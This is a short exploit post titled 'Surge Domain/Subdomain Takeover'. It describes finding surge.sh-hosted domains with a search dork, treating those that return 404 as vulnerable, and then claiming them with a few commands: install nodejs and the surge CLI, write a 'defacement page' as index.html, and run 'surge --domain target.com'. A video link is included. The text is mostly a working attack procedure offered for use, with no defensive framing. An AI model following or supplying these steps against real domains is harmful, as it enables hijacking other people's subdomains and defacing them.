Exploit title: Surge Domain/Subdomain Takeover 
Author : Security007
Vendor Homepage : surge.sh
Tested on : windows 10 x64
Dork : intext:powered by surge.sh


Find The target:
--> Dorking with search engine
--> Check the header status code *Note only 404 header status code are vulnerable

How to exploit this??
First:
intall nodejs
--> curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
--> sudo apt-get install -y nodejs

Second: install surge 
--> sudo npm install --global surge (if you dont't installed npm, so install it first)
make a new directory:
--> mkdir takeover
open the directory:
--> cd takeover 
make a defacement page and save as index.html:
--> nano index.html
exploit it: 
--> surge --domain target.com 

Video :
https://youtu.be/-i6cQuluXbY